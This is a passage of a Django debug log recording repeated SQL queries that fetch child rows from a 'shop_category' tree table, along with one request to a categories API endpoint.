"shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 06:32:54,648 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 06:32:54,651 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 06:32:54,653 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 06:32:54,655 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 06:32:54,659 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 06:32:54,661 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 06:32:54,663 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 06:32:54,665 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 06:32:54,668 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 06:32:54,671 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 06:32:54,674 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 06:32:54,676 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 06:32:54,679 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 06:32:54,681 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 06:32:54,683 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 06:32:54,686 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 06:32:54,689 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 06:32:54,691 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 06:32:54,693 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 06:32:54,696 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 06:32:54,699 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 06:32:54,701 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 06:32:54,703 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 06:32:54,705 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 06:32:54,707 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 06:32:54,711 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 06:32:54,713 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 06:32:54,715 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 06:32:54,717 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 06:32:54,720 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 06:32:54,722 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 06:32:54,724 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 06:32:54,726 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 06:32:54,729 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 06:32:54,731 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 06:32:54,733 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 06:32:54] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 06:34:47,530 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 06:34:47,541 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 06:34:47,547 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 06:34:47,551 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 06:34:47,557 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 06:34:47,561 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 06:34:47,566 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 06:34:47,570 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 06:34:47,574 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 06:34:47,580 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 06:34:47,584 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 06:34:47,588 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 06:34:47,592 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 06:34:47,596 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 06:34:47,602 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 06:34:47,606 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 06:34:47,610 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 06:34:47,615 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 06:34:47,619 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 06:34:47,625 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 06:34:47,629 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 06:34:47,633 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 06:34:47,637 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 06:34:47,641 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 06:34:47,645 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 06:34:47,652 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 06:34:47,656 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 06:34:47,660 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 06:34:47,664 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 06:34:47,668 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 06:34:47,674 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) 